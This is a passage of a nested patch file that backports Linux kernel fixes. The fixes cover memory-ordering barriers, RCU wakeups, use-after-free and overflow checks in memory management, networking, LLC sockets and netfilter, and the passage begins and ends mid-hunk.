+ 	unsigned i;
+ 
+ 	while (1) {
+-		wait_event(d->go, atomic_read(&d->ready) ||
++		wait_event(d->go, atomic_read_acquire(&d->ready) ||
+ 		                  kthread_should_stop());
+ 		if (kthread_should_stop()) {
+ 			d->thr = NULL;
+-			atomic_set(&d->stop, 1);
++			atomic_set_release(&d->stop, 1);
+ 			wake_up(&d->done);
+ 			break;
+ 		}
+@@ -618,7 +618,7 @@ static int crc32_threadfn(void *data)
+ 		for (i = 0; i < d->run_threads; i++)
+ 			*d->crc32 = crc32_le(*d->crc32,
+ 			                     d->unc[i], *d->unc_len[i]);
+-		atomic_set(&d->stop, 1);
++		atomic_set_release(&d->stop, 1);
+ 		wake_up(&d->done);
+ 	}
+ 	return 0;
+@@ -648,12 +648,12 @@ static int lzo_compress_threadfn(void *data)
+ 	struct cmp_data *d = data;
+ 
+ 	while (1) {
+-		wait_event(d->go, atomic_read(&d->ready) ||
++		wait_event(d->go, atomic_read_acquire(&d->ready) ||
+ 		                  kthread_should_stop());
+ 		if (kthread_should_stop()) {
+ 			d->thr = NULL;
+ 			d->ret = -1;
+-			atomic_set(&d->stop, 1);
++			atomic_set_release(&d->stop, 1);
+ 			wake_up(&d->done);
+ 			break;
+ 		}
+@@ -662,7 +662,7 @@ static int lzo_compress_threadfn(void *data)
+ 		d->ret = lzo1x_1_compress(d->unc, d->unc_len,
+ 		                          d->cmp + LZO_HEADER, &d->cmp_len,
+ 		                          d->wrk);
+-		atomic_set(&d->stop, 1);
++		atomic_set_release(&d->stop, 1);
+ 		wake_up(&d->done);
+ 	}
+ 	return 0;
+@@ -797,7 +797,7 @@ static int save_image_lzo(struct swap_map_handle *handle,
+ 
+ 			data[thr].unc_len = off;
+ 
+-			atomic_set(&data[thr].ready, 1);
++			atomic_set_release(&data[thr].ready, 1);
+ 			wake_up(&data[thr].go);
+ 		}
+ 
+@@ -805,12 +805,12 @@ static int save_image_lzo(struct swap_map_handle *handle,
+ 			break;
+ 
+ 		crc->run_threads = thr;
+-		atomic_set(&crc->ready, 1);
++		atomic_set_release(&crc->ready, 1);
+ 		wake_up(&crc->go);
+ 
+ 		for (run_threads = thr, thr = 0; thr < run_threads; thr++) {
+ 			wait_event(data[thr].done,
+-			           atomic_read(&data[thr].stop));
++				atomic_read_acquire(&data[thr].stop));
+ 			atomic_set(&data[thr].stop, 0);
+ 
+ 			ret = data[thr].ret;
+@@ -849,7 +849,7 @@ static int save_image_lzo(struct swap_map_handle *handle,
+ 			}
+ 		}
+ 
+-		wait_event(crc->done, atomic_read(&crc->stop));
++		wait_event(crc->done, atomic_read_acquire(&crc->stop));
+ 		atomic_set(&crc->stop, 0);
+ 	}
+ 
+@@ -1131,12 +1131,12 @@ static int lzo_decompress_threadfn(void *data)
+ 	struct dec_data *d = data;
+ 
+ 	while (1) {
+-		wait_event(d->go, atomic_read(&d->ready) ||
++		wait_event(d->go, atomic_read_acquire(&d->ready) ||
+ 		                  kthread_should_stop());
+ 		if (kthread_should_stop()) {
+ 			d->thr = NULL;
+ 			d->ret = -1;
+-			atomic_set(&d->stop, 1);
++			atomic_set_release(&d->stop, 1);
+ 			wake_up(&d->done);
+ 			break;
+ 		}
+@@ -1149,7 +1149,7 @@ static int lzo_decompress_threadfn(void *data)
+ 			flush_icache_range((unsigned long)d->unc,
+ 					   (unsigned long)d->unc + d->unc_len);
+ 
+-		atomic_set(&d->stop, 1);
++		atomic_set_release(&d->stop, 1);
+ 		wake_up(&d->done);
+ 	}
+ 	return 0;
+@@ -1334,7 +1334,7 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 		}
+ 
+ 		if (crc->run_threads) {
+-			wait_event(crc->done, atomic_read(&crc->stop));
++			wait_event(crc->done, atomic_read_acquire(&crc->stop));
+ 			atomic_set(&crc->stop, 0);
+ 			crc->run_threads = 0;
+ 		}
+@@ -1370,7 +1370,7 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 					pg = 0;
+ 			}
+ 
+-			atomic_set(&data[thr].ready, 1);
++			atomic_set_release(&data[thr].ready, 1);
+ 			wake_up(&data[thr].go);
+ 		}
+ 
+@@ -1389,7 +1389,7 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 
+ 		for (run_threads = thr, thr = 0; thr < run_threads; thr++) {
+ 			wait_event(data[thr].done,
+-			           atomic_read(&data[thr].stop));
++				atomic_read_acquire(&data[thr].stop));
+ 			atomic_set(&data[thr].stop, 0);
+ 
+ 			ret = data[thr].ret;
+@@ -1420,7 +1420,7 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 				ret = snapshot_write_next(snapshot);
+ 				if (ret <= 0) {
+ 					crc->run_threads = thr + 1;
+-					atomic_set(&crc->ready, 1);
++					atomic_set_release(&crc->ready, 1);
+ 					wake_up(&crc->go);
+ 					goto out_finish;
+ 				}
+@@ -1428,13 +1428,13 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 		}
+ 
+ 		crc->run_threads = thr;
+-		atomic_set(&crc->ready, 1);
++		atomic_set_release(&crc->ready, 1);
+ 		wake_up(&crc->go);
+ 	}
+ 
+ out_finish:
+ 	if (crc->run_threads) {
+-		wait_event(crc->done, atomic_read(&crc->stop));
++		wait_event(crc->done, atomic_read_acquire(&crc->stop));
+ 		atomic_set(&crc->stop, 0);
+ 	}
+ 	stop = ktime_get();
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 15df37bc052a9..9d7464a90f85d 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -1051,6 +1051,38 @@ static bool rcu_future_gp_cleanup(struct rcu_node *rnp)
+ 	return needmore;
+ }
+ 
++static void swake_up_one_online_ipi(void *arg)
++{
++	struct swait_queue_head *wqh = arg;
++
++	swake_up_one(wqh);
++}
++
++static void swake_up_one_online(struct swait_queue_head *wqh)
++{
++	int cpu = get_cpu();
++
++	/*
++	 * If called from rcutree_report_cpu_starting(), wake up
++	 * is dangerous that late in the CPU-down hotplug process. The
++	 * scheduler might queue an ignored hrtimer. Defer the wake up
++	 * to an online CPU instead.
++	 */
++	if (unlikely(cpu_is_offline(cpu))) {
++		int target;
++
++		target = cpumask_any_and(housekeeping_cpumask(HK_TYPE_RCU),
++					 cpu_online_mask);
++
++		smp_call_function_single(target, swake_up_one_online_ipi,
++					 wqh, 0);
++		put_cpu();
++	} else {
++		put_cpu();
++		swake_up_one(wqh);
++	}
++}
++
+ /*
+  * Awaken the grace-period kthread.  Don't do a self-awaken (unless in an
+  * interrupt or softirq handler, in which case we just might immediately
+@@ -1075,7 +1107,7 @@ static void rcu_gp_kthread_wake(void)
+ 		return;
+ 	WRITE_ONCE(rcu_state.gp_wake_time, jiffies);
+ 	WRITE_ONCE(rcu_state.gp_wake_seq, READ_ONCE(rcu_state.gp_seq));
+-	swake_up_one(&rcu_state.gp_wq);
++	swake_up_one_online(&rcu_state.gp_wq);
+ }
+ 
+ /*
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index aa3ec3c3b9f75..6d2cbed96b462 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -172,7 +172,6 @@ static bool sync_rcu_exp_done_unlocked(struct rcu_node *rnp)
+ 	return ret;
+ }
+ 
+-
+ /*
+  * Report the exit from RCU read-side critical section for the last task
+  * that queued itself during or before the current expedited preemptible-RCU
+@@ -200,7 +199,7 @@ static void __rcu_report_exp_rnp(struct rcu_node *rnp,
+ 			raw_spin_unlock_irqrestore_rcu_node(rnp, flags);
+ 			if (wake) {
+ 				smp_mb(); /* EGP done before wake_up(). */
+-				swake_up_one(&rcu_state.expedited_wq);
++				swake_up_one_online(&rcu_state.expedited_wq);
+ 			}
+ 			break;
+ 		}
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index 1a5d02224d465..8cfdc6b978d76 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -1557,6 +1557,7 @@ void tick_cancel_sched_timer(int cpu)
+ {
+ 	struct tick_sched *ts = &per_cpu(tick_cpu_sched, cpu);
+ 	ktime_t idle_sleeptime, iowait_sleeptime;
++	unsigned long idle_calls, idle_sleeps;
+ 
+ # ifdef CONFIG_HIGH_RES_TIMERS
+ 	if (ts->sched_timer.base)
+@@ -1565,9 +1566,13 @@ void tick_cancel_sched_timer(int cpu)
+ 
+ 	idle_sleeptime = ts->idle_sleeptime;
+ 	iowait_sleeptime = ts->iowait_sleeptime;
++	idle_calls = ts->idle_calls;
++	idle_sleeps = ts->idle_sleeps;
+ 	memset(ts, 0, sizeof(*ts));
+ 	ts->idle_sleeptime = idle_sleeptime;
+ 	ts->iowait_sleeptime = iowait_sleeptime;
++	ts->idle_calls = idle_calls;
++	ts->idle_sleeps = idle_sleeps;
+ }
+ #endif
+ 
+diff --git a/kernel/trace/tracing_map.c b/kernel/trace/tracing_map.c
+index c774e560f2f95..a4dcf0f243521 100644
+--- a/kernel/trace/tracing_map.c
++++ b/kernel/trace/tracing_map.c
+@@ -574,7 +574,12 @@ __tracing_map_insert(struct tracing_map *map, void *key, bool lookup_only)
+ 				}
+ 
+ 				memcpy(elt->key, key, map->key_size);
+-				entry->val = elt;
++				/*
++				 * Ensure the initialization is visible and
++				 * publish the elt.
++				 */
++				smp_wmb();
++				WRITE_ONCE(entry->val, elt);
+ 				atomic64_inc(&map->hits);
+ 
+ 				return entry->val;
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 4583f8a42d914..c783806eefc9f 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -4921,14 +4921,9 @@ should_reclaim_retry(gfp_t gfp_mask, unsigned order,
+ 	else
+ 		(*no_progress_loops)++;
+ 
+-	/*
+-	 * Make sure we converge to OOM if we cannot make any progress
+-	 * several times in the row.
+-	 */
+-	if (*no_progress_loops > MAX_RECLAIM_RETRIES) {
+-		/* Before OOM, exhaust highatomic_reserve */
+-		return unreserve_highatomic_pageblock(ac, true);
+-	}
++	if (*no_progress_loops > MAX_RECLAIM_RETRIES)
++		goto out;
++
+ 
+ 	/*
+ 	 * Keep reclaiming pages while there is a chance this will lead
+@@ -4971,6 +4966,11 @@ should_reclaim_retry(gfp_t gfp_mask, unsigned order,
+ 		schedule_timeout_uninterruptible(1);
+ 	else
+ 		cond_resched();
++out:
++	/* Before OOM, exhaust highatomic_reserve */
++	if (!ret)
++		return unreserve_highatomic_pageblock(ac, true);
++
+ 	return ret;
+ }
+ 
+diff --git a/mm/sparse.c b/mm/sparse.c
+index e5a8a3a0edd74..05d1e7b6c6dba 100644
+--- a/mm/sparse.c
++++ b/mm/sparse.c
+@@ -792,6 +792,13 @@ static void section_deactivate(unsigned long pfn, unsigned long nr_pages,
+ 	if (empty) {
+ 		unsigned long section_nr = pfn_to_section_nr(pfn);
+ 
++		/*
++		 * Mark the section invalid so that valid_section()
++		 * return false. This prevents code from dereferencing
++		 * ms->usage array.
++		 */
++		ms->section_mem_map &= ~SECTION_HAS_MEM_MAP;
++
+ 		/*
+ 		 * When removing an early section, the usage map is kept (as the
+ 		 * usage maps of other sections fall into the same page). It
+@@ -800,16 +807,10 @@ static void section_deactivate(unsigned long pfn, unsigned long nr_pages,
+ 		 * was allocated during boot.
+ 		 */
+ 		if (!PageReserved(virt_to_page(ms->usage))) {
+-			kfree(ms->usage);
+-			ms->usage = NULL;
++			kfree_rcu(ms->usage, rcu);
++			WRITE_ONCE(ms->usage, NULL);
+ 		}
+ 		memmap = sparse_decode_mem_map(ms->section_mem_map, section_nr);
+-		/*
+-		 * Mark the section invalid so that valid_section()
+-		 * return false. This prevents code from dereferencing
+-		 * ms->usage array.
+-		 */
+-		ms->section_mem_map &= ~SECTION_HAS_MEM_MAP;
+ 	}
+ 
+ 	/*
+diff --git a/net/8021q/vlan_netlink.c b/net/8021q/vlan_netlink.c
+index 214532173536b..a3b68243fd4b1 100644
+--- a/net/8021q/vlan_netlink.c
++++ b/net/8021q/vlan_netlink.c
+@@ -118,12 +118,16 @@ static int vlan_changelink(struct net_device *dev, struct nlattr *tb[],
+ 	}
+ 	if (data[IFLA_VLAN_INGRESS_QOS]) {
+ 		nla_for_each_nested(attr, data[IFLA_VLAN_INGRESS_QOS], rem) {
++			if (nla_type(attr) != IFLA_VLAN_QOS_MAPPING)
++				continue;
+ 			m = nla_data(attr);
+ 			vlan_dev_set_ingress_priority(dev, m->to, m->from);
+ 		}
+ 	}
+ 	if (data[IFLA_VLAN_EGRESS_QOS]) {
+ 		nla_for_each_nested(attr, data[IFLA_VLAN_EGRESS_QOS], rem) {
++			if (nla_type(attr) != IFLA_VLAN_QOS_MAPPING)
++				continue;
+ 			m = nla_data(attr);
+ 			err = vlan_dev_set_egress_priority(dev, m->from, m->to);
+ 			if (err)
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 0a5566b6f8a25..1ba3662faf0aa 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -11323,6 +11323,7 @@ static struct pernet_operations __net_initdata netdev_net_ops = {
+ 
+ static void __net_exit default_device_exit_net(struct net *net)
+ {
++	struct netdev_name_node *name_node, *tmp;
+ 	struct net_device *dev, *aux;
+ 	/*
+ 	 * Push all migratable network devices back to the
+@@ -11345,6 +11346,14 @@ static void __net_exit default_device_exit_net(struct net *net)
+ 		snprintf(fb_name, IFNAMSIZ, "dev%d", dev->ifindex);
+ 		if (netdev_name_in_use(&init_net, fb_name))
+ 			snprintf(fb_name, IFNAMSIZ, "dev%%d");
++
++		netdev_for_each_altname_safe(dev, name_node, tmp)
++			if (netdev_name_in_use(&init_net, name_node->name)) {
++				netdev_name_node_del(name_node);
++				synchronize_rcu();
++				__netdev_name_node_alt_destroy(name_node);
++			}
++
+ 		err = dev_change_net_namespace(dev, &init_net, fb_name);
+ 		if (err) {
+ 			pr_emerg("%s: failed to move %s to init_net: %d\n",
+diff --git a/net/core/dev.h b/net/core/dev.h
+index 9ca91457c197e..db9ff8cd8d46d 100644
+--- a/net/core/dev.h
++++ b/net/core/dev.h
+@@ -63,6 +63,9 @@ int dev_change_name(struct net_device *dev, const char *newname);
+ 
+ #define netdev_for_each_altname(dev, namenode)				\
+ 	list_for_each_entry((namenode), &(dev)->name_node->list, list)
++#define netdev_for_each_altname_safe(dev, namenode, next)		\
++	list_for_each_entry_safe((namenode), (next), &(dev)->name_node->list, \
++				 list)
+ 
+ int netdev_name_node_alt_create(struct net_device *dev, const char *name);
+ int netdev_name_node_alt_destroy(struct net_device *dev, const char *name);
+diff --git a/net/core/request_sock.c b/net/core/request_sock.c
+index f35c2e9984062..63de5c635842b 100644
+--- a/net/core/request_sock.c
++++ b/net/core/request_sock.c
+@@ -33,9 +33,6 @@
+ 
+ void reqsk_queue_alloc(struct request_sock_queue *queue)
+ {
+-	spin_lock_init(&queue->rskq_lock);
+-
+-	spin_lock_init(&queue->fastopenq.lock);
+ 	queue->fastopenq.rskq_rst_head = NULL;
+ 	queue->fastopenq.rskq_rst_tail = NULL;
+ 	queue->fastopenq.qlen = 0;
+diff --git a/net/core/sock.c b/net/core/sock.c
+index c50a14a02edd4..c8803b95ea0da 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -107,6 +107,7 @@
+ #include <linux/interrupt.h>
+ #include <linux/poll.h>
+ #include <linux/tcp.h>
++#include <linux/udp.h>
+ #include <linux/init.h>
+ #include <linux/highmem.h>
+ #include <linux/user_namespace.h>
+@@ -4109,8 +4110,14 @@ bool sk_busy_loop_end(void *p, unsigned long start_time)
+ {
+ 	struct sock *sk = p;
+ 
+-	return !skb_queue_empty_lockless(&sk->sk_receive_queue) ||
+-	       sk_busy_loop_timeout(sk, start_time);
++	if (!skb_queue_empty_lockless(&sk->sk_receive_queue))
++		return true;
++
++	if (sk_is_udp(sk) &&
++	    !skb_queue_empty_lockless(&udp_sk(sk)->reader_queue))
++		return true;
++
++	return sk_busy_loop_timeout(sk, start_time);
+ }
+ EXPORT_SYMBOL(sk_busy_loop_end);
+ #endif /* CONFIG_NET_RX_BUSY_POLL */
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index c13b8ed63f87e..2f646335d2183 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -324,6 +324,9 @@ lookup_protocol:
+ 	if (INET_PROTOSW_REUSE & answer_flags)
+ 		sk->sk_reuse = SK_CAN_REUSE;
+ 
++	if (INET_PROTOSW_ICSK & answer_flags)
++		inet_init_csk_locks(sk);
++
+ 	inet = inet_sk(sk);
+ 	inet->is_icsk = (INET_PROTOSW_ICSK & answer_flags) != 0;
+ 
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 80ce0112e24b4..79fa19a36bbd1 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -727,6 +727,10 @@ out:
+ 	}
+ 	if (req)
+ 		reqsk_put(req);
++
++	if (newsk)
++		inet_init_csk_locks(newsk);
++
+ 	return newsk;
+ out_err:
+ 	newsk = NULL;
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 0b7844a8d5711..90e24c3f65570 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -718,6 +718,7 @@ void tcp_push(struct sock *sk, int flags, int mss_now,
+ 		if (!test_bit(TSQ_THROTTLED, &sk->sk_tsq_flags)) {
+ 			NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPAUTOCORKING);
+ 			set_bit(TSQ_THROTTLED, &sk->sk_tsq_flags);
++			smp_mb__after_atomic();
+ 		}
+ 		/* It is possible TX completion already happened
+ 		 * before we set TSQ_THROTTLED.
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index a2f29ca516000..0b42eb8c55aaf 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -199,6 +199,9 @@ lookup_protocol:
+ 	if (INET_PROTOSW_REUSE & answer_flags)
+ 		sk->sk_reuse = SK_CAN_REUSE;
+ 
++	if (INET_PROTOSW_ICSK & answer_flags)
++		inet_init_csk_locks(sk);
++
+ 	inet = inet_sk(sk);
+ 	inet->is_icsk = (INET_PROTOSW_ICSK & answer_flags) != 0;
+ 
+diff --git a/net/llc/af_llc.c b/net/llc/af_llc.c
+index 9ffbc667be6cf..19c478bd85bd8 100644
+--- a/net/llc/af_llc.c
++++ b/net/llc/af_llc.c
+@@ -928,14 +928,15 @@ copy_uaddr:
+  */
+ static int llc_ui_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ {
++	DECLARE_SOCKADDR(struct sockaddr_llc *, addr, msg->msg_name);
+ 	struct sock *sk = sock->sk;
+ 	struct llc_sock *llc = llc_sk(sk);
+-	DECLARE_SOCKADDR(struct sockaddr_llc *, addr, msg->msg_name);
+ 	int flags = msg->msg_flags;
+ 	int noblock = flags & MSG_DONTWAIT;
++	int rc = -EINVAL, copied = 0, hdrlen, hh_len;
+ 	struct sk_buff *skb = NULL;
++	struct net_device *dev;
+ 	size_t size = 0;
+-	int rc = -EINVAL, copied = 0, hdrlen;
+ 
+ 	dprintk("%s: sending from %02X to %02X\n", __func__,
+ 		llc->laddr.lsap, llc->daddr.lsap);
+@@ -955,22 +956,29 @@ static int llc_ui_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 		if (rc)
+ 			goto out;
+ 	}
+-	hdrlen = llc->dev->hard_header_len + llc_ui_header_len(sk, addr);
++	dev = llc->dev;
++	hh_len = LL_RESERVED_SPACE(dev);
++	hdrlen = llc_ui_header_len(sk, addr);
+ 	size = hdrlen + len;
+-	if (size > llc->dev->mtu)
+-		size = llc->dev->mtu;
++	size = min_t(size_t, size, READ_ONCE(dev->mtu));
+ 	copied = size - hdrlen;
+ 	rc = -EINVAL;
+ 	if (copied < 0)
+ 		goto out;
+ 	release_sock(sk);
+-	skb = sock_alloc_send_skb(sk, size, noblock, &rc);
++	skb = sock_alloc_send_skb(sk, hh_len + size, noblock, &rc);
+ 	lock_sock(sk);
+ 	if (!skb)
+ 		goto out;
+-	skb->dev      = llc->dev;
++	if (sock_flag(sk, SOCK_ZAPPED) ||
++	    llc->dev != dev ||
++	    hdrlen != llc_ui_header_len(sk, addr) ||
++	    hh_len != LL_RESERVED_SPACE(dev) ||
++	    size > READ_ONCE(dev->mtu))
++		goto out;
++	skb->dev      = dev;
+ 	skb->protocol = llc_proto_type(addr->sllc_arphrd);
+-	skb_reserve(skb, hdrlen);
++	skb_reserve(skb, hh_len + hdrlen);
+ 	rc = memcpy_from_msg(skb_put(skb, copied), msg, copied);
+ 	if (rc)
+ 		goto out;
+diff --git a/net/llc/llc_core.c b/net/llc/llc_core.c
+index 6e387aadffcec..4f16d9c88350b 100644
+--- a/net/llc/llc_core.c
++++ b/net/llc/llc_core.c
+@@ -135,22 +135,15 @@ static struct packet_type llc_packet_type __read_mostly = {
+ 	.func = llc_rcv,
+ };
+ 
+-static struct packet_type llc_tr_packet_type __read_mostly = {
+-	.type = cpu_to_be16(ETH_P_TR_802_2),
+-	.func = llc_rcv,
+-};
+-
+ static int __init llc_init(void)
+ {
+ 	dev_add_pack(&llc_packet_type);
+-	dev_add_pack(&llc_tr_packet_type);
+ 	return 0;
+ }
+ 
+ static void __exit llc_exit(void)
+ {
+ 	dev_remove_pack(&llc_packet_type);
+-	dev_remove_pack(&llc_tr_packet_type);
+ }
+ 
+ module_init(llc_init);
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 49b71453dec37..f3d6c3e4c970e 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -396,7 +396,10 @@ void sta_info_free(struct ieee80211_local *local, struct sta_info *sta)
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(sta->link); i++) {
+-		if (!(sta->sta.valid_links & BIT(i)))
++		struct link_sta_info *link_sta;
++
++		link_sta = rcu_access_pointer(sta->link[i]);
++		if (!link_sta)
+ 			continue;
+ 
+ 		sta_remove_link(sta, i, false);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 2702294ac46c6..1edb2138260a8 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -24,6 +24,7 @@
+ #include <net/sock.h>
+ 
+ #define NFT_MODULE_AUTOLOAD_LIMIT (MODULE_NAME_LEN - sizeof("nft-expr-255-"))
++#define NFT_SET_MAX_ANONLEN 16
+ 
+ unsigned int nf_tables_net_id __read_mostly;
+ 
+@@ -4127,6 +4128,9 @@ static int nf_tables_set_alloc_name(struct nft_ctx *ctx, struct nft_set *set,
+ 		if (p[1] != 'd' || strchr(p + 2, '%'))
+ 			return -EINVAL;
+ 
++		if (strnlen(name, NFT_SET_MAX_ANONLEN) >= NFT_SET_MAX_ANONLEN)
++			return -EINVAL;
++
+ 		inuse = (unsigned long *)get_zeroed_page(GFP_KERNEL);
+ 		if (inuse == NULL)
+ 			return -ENOMEM;
+@@ -10444,16 +10448,10 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 	data->verdict.code = ntohl(nla_get_be32(tb[NFTA_VERDICT_CODE]));
+ 
+ 	switch (data->verdict.code) {
+-	default:
+-		switch (data->verdict.code & NF_VERDICT_MASK) {
+-		case NF_ACCEPT:
+-		case NF_DROP:
+-		case NF_QUEUE:
+-			break;
+-		default:
+-			return -EINVAL;
+-		}
+-		fallthrough;
++	case NF_ACCEPT:
++	case NF_DROP:
++	case NF_QUEUE:
++		break;
+ 	case NFT_CONTINUE:
+ 	case NFT_BREAK:
+ 	case NFT_RETURN:
+@@ -10488,6 +10486,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 
+ 		data->verdict.chain = chain;
+ 		break;
++	default:
++		return -EINVAL;
+ 	}
+ 
+ 	desc->len = sizeof(data->verdict);
+diff --git a/net/netfilter/nft_chain_filter.c b/net/netfilter/nft_chain_filter.c
+index 680fe557686e4..274b6f7e6bb57 100644
+--- a/net/netfilter/nft_chain_filter.c
++++ b/net/netfilter/nft_chain_filter.c
+@@ -357,9 +357,10 @@ static int nf_tables_netdev_event(struct notifier_block *this,
+ 				  unsigned long event, void *ptr)
+ {
+ 	struct net_device *dev = netdev_notifier_info_to_dev(ptr);
++	struct nft_base_chain *basechain;
+ 	struct nftables_pernet *nft_net;
+-	struct nft_table *table;
+ 	struct nft_chain *chain, *nr;
++	struct nft_table *table;
+ 	struct nft_ctx ctx = {
+ 		.net	= dev_net(dev),
+ 	};
+@@ -371,7 +372,8 @@ static int nf_tables_netdev_event(struct notifier_block *this,
+ 	nft_net = nft_pernet(ctx.net);
+ 	mutex_lock(&nft_net->commit_mutex);
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+-		if (table->family != NFPROTO_NETDEV)
++		if (table->family != NFPROTO_NETDEV &&
++		    table->family != NFPROTO_INET)
+ 			continue;
+ 
+ 		ctx.family = table->family;
+@@ -380,6 +382,11 @@ static int nf_tables_netdev_event(struct notifier_block *this,
+ 			if (!nft_is_base_chain(chain))
+ 				continue;
+ 
++			basechain = nft_base_chain(chain);
++			if (table->family == NFPROTO_INET &&
++			    basechain->ops.hooknum != NF_INET_INGRESS)
++				continue;
++
+ 			ctx.chain = chain;
+ 			nft_netdev_event(event, dev, &ctx);
+ 		}
+diff --git a/net/netfilter/nft_compat.c b/net/netfilter/nft_compat.c
+index c16172427622e..6952da7dfc02c 100644
+--- a/net/netfilter/nft_compat.c
++++ b/net/netfilter/nft_compat.c
+@@ -349,6 +349,12 @@ static int nft_target_validate(const struct nft_ctx *ctx,
+ 	unsigned int hook_mask = 0;
+ 	int ret;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_BRIDGE &&
++	    ctx->family != NFPROTO_ARP)
++		return -EOPNOTSUPP;
++
+ 	if (nft_is_base_chain(ctx->chain)) {
+ 		const struct nft_base_chain *basechain =
+ 						nft_base_chain(ctx->chain);
+@@ -592,6 +598,12 @@ static int nft_match_validate(const struct nft_ctx *ctx,
+ 	unsigned int hook_mask = 0;
+ 	int ret;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_BRIDGE &&
++	    ctx->family != NFPROTO_ARP)
++		return -EOPNOTSUPP;
++
+ 	if (nft_is_base_chain(ctx->chain)) {
+ 		const struct nft_base_chain *basechain =
+ 						nft_base_chain(ctx->chain);
+diff --git a/net/netfilter/nft_flow_offload.c b/net/netfilter/nft_flow_offload.c
+index 8a43f6f9c90b6..3d9f6dda5aeb2 100644
+--- a/net/netfilter/nft_flow_offload.c
++++ b/net/netfilter/nft_flow_offload.c
+@@ -380,6 +380,11 @@ static int nft_flow_offload_validate(const struct nft_ctx *ctx,
+ {
+ 	unsigned int hook_mask = (1 << NF_INET_FORWARD);
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	return nft_chain_validate_hooks(ctx->chain, hook_mask);
+ }
+ 
+diff --git a/net/netfilter/nft_limit.c b/net/netfilter/nft_limit.c
+index 75c05ef885a91..36ded7d43262c 100644
+--- a/net/netfilter/nft_limit.c
++++ b/net/netfilter/nft_limit.c
+@@ -58,17 +58,19 @@ static inline bool nft_limit_eval(struct nft_limit_priv *priv, u64 cost)
+ static int nft_limit_init(struct nft_limit_priv *priv,
+ 			  const struct nlattr * const tb[], bool pkts)
+ {
++	u64 unit, tokens, rate_with_burst;
+ 	bool invert = false;
+-	u64 unit, tokens;
+ 
+ 	if (tb[NFTA_LIMIT_RATE] == NULL ||
+ 	    tb[NFTA_LIMIT_UNIT] == NULL)
+ 		return -EINVAL;
+ 
+ 	priv->rate = be64_to_cpu(nla_get_be64(tb[NFTA_LIMIT_RATE]));
++	if (priv->rate == 0)
++		return -EINVAL;
++
+ 	unit = be64_to_cpu(nla_get_be64(tb[NFTA_LIMIT_UNIT]));
+-	priv->nsecs = unit * NSEC_PER_SEC;
+-	if (priv->rate == 0 || priv->nsecs < unit)
++	if (check_mul_overflow(unit, NSEC_PER_SEC, &priv->nsecs))
+ 		return -EOVERFLOW;
+ 
+ 	if (tb[NFTA_LIMIT_BURST])
+@@ -77,18 +79,25 @@ static int nft_limit_init(struct nft_limit_priv *priv,
+ 	if (pkts && priv->burst == 0)
+ 		priv->burst = NFT_LIMIT_PKT_BURST_DEFAULT;
+ 
+-	if (priv->rate + priv->burst < priv->rate)
++	if (check_add_overflow(priv->rate, priv->burst, &rate_with_burst))
+ 		return -EOVERFLOW;
+ 
+ 	if (pkts) {
+-		tokens = div64_u64(priv->nsecs, priv->rate) * priv->burst;
++		u64 tmp = div64_u64(priv->nsecs, priv->rate);
++
++		if (check_mul_overflow(tmp, priv->burst, &tokens))
++			return -EOVERFLOW;
+ 	} else {
++		u64 tmp;
++
+ 		/* The token bucket size limits the number of tokens can be
+ 		 * accumulated. tokens_max specifies the bucket size.
+ 		 * tokens_max = unit * (rate + burst) / rate.
+ 		 */
+-		tokens = div64_u64(priv->nsecs * (priv->rate + priv->burst),
+-				 priv->rate);
++		if (check_mul_overflow(priv->nsecs, rate_with_burst, &tmp))
++			return -EOVERFLOW;
++
++		tokens = div64_u64(tmp, priv->rate);
+ 	}
+ 
+ 	if (tb[NFTA_LIMIT_FLAGS]) {
+diff --git a/net/netfilter/nft_nat.c b/net/netfilter/nft_nat.c
